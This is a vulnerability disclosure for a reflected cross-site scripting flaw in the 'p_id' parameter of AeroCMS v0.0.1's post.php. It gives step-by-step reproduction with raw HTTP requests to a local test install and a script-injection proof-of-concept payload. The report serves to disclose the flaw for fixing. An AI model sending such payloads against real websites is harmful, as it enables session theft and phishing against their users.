Reflected XSS Vulnerability on AeroCMS v0.0.1

[rahadchowdhury]

Description:
I found Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post.php page "p_id" parameter. When I use malicious code or use any XSS payload then the browser give me result. Because a browser can not know if the script should be trusted or not.

CMS Version:
v0.0.1

Affected URL:
http://127.0.0.1/AeroCMS/post.php

Steps to Reproduce:

1. At first open http://127.0.0.1/AeroCMS/
2. then click "Read More" button from page post.
3. then your request data will be

GET /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

4. "p_id" parameter is vulnerable. Let's try to use XSS payload "><script>alert(1)</script> or use any XSS payload in "p_id" parameter and your request data will be

GET /AeroCMS/post.php?p_id=1"><script>alert(1)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

5. Catch!! You will see xss popup.

Proof of Concept:
You can see the Proof of Concept. which I've attached screenshots to confirm the vulnerability.

Impact:
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/